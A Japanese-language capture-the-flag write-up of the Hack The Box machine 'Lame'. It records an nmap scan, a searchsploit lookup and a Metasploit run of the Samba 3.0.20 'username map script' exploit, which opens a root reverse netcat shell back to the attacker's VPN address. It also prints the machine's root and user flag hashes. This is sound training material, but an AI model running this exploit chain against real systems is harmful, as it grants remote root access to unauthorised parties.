Lame Hack-the-box
tags: hack the box linux ペネトレーションテスト
# Nmap 7.91 scan initiated Fri Mar 18 11:53:06 2022 as: nmap -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3 Nmap scan report for 10.10.10.3 Host is up (0.37s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.5 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h00m20s, deviation: 2h49m43s, median: 19s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2022-03-18T11:54:06-04:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 211.72 ms 10.10.16.1 2 426.18 ms 10.10.10.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 18 11:54:28 2022 -- 1 IP address (1 host up) scanned in 81.84 seconds
nmapで解析してみると、3.0.20 versionのSambaが動いている。
└─$ searchsploit Samba 3.0.20 1 ⚙ ------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------ --------------------------------- Samba 3.0.10 < 3.3.5 - Format String / Security | multiple/remote/10095.txt Samba 3.0.20 < 3.0.25rc3 - 'Username' map scrip | unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py ------------------------------------------------ --------------------------------- Shellcodes: No Results
exploitを探してみると,Samba 3.0.20 < 3.0.25rc3 - 'Username' map scripがあったので、これが動くかどうか試してみる。
└─$ msfconsole 1 ⚙
[!] The following modules were loaded with warnings:
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v6.1.32-dev ]
+ -- --=[ 2206 exploits - 1168 auxiliary - 395 post ]
+ -- --=[ 596 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
msf6 > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
exploit/multi/samba/usermap_scriptがあるので、それを使ってみる
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specif
ied)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
optionを見てみると、targetのhostを設定するためにRHOSTSを設定する。
また、reverse_netcatということは、リバースシェルを実行すると思う。
serverをLHOSTで設定できる。
vpnを通して、ターゲットにアクセスしているので、
vpnのサーバーのinetをLHOSTに設定しなければならない?(なぜ?)
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.10.16.5/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:4::1003/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::e799:9d19:158c:faac/64 scope link stable-privacy
valid_lft forever preferred_lft forever
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.16.5 LHOST => 10.10.16.5 msf6 exploit(multi/samba/usermap_script) > set RhOSTS 10.10.10.3
実際にexploitしてみる。
msf6 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP handler on 10.10.16.5:4444 [*] Command shell session 1 opened (10.10.16.5:4444 -> 10.10.10.3:47875 ) at 2022-03-18 14:05:32 -0400 ls bin boot cdrom dev etc home initrd initrd.img initrd.img.old lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz vmlinuz.old id uid=0(root) gid=0(root)
root権限でアクセスできているので安心。
root.txtを探してみる
root@lame:/# find / | grep -e 'root\.txt' find / | grep -e 'root\.txt' /root/root.txt
root@lame:/# cat /root/root.txt cat /root/root.txt 88307a9edf8ed976de2ff8c6c98aa5e
root.txtゲット!!
user.txtも探してみる。
find / | grep -e 'user\.txt' /home/makis/user.txt /usr/share/doc/fontconfig-config/fontconfig-user.txt.gz
cat /home/makis/user.txt afc12323eec3ad3d84b9595ae583bd6e
無事ゲット。
まとめ
はじめてのhack the boxなのでどこから初めていいのか分からずに、
youtubeのwriteupを見てやりました。
これを機に一日一つのMachineを解いていきたいと思います。
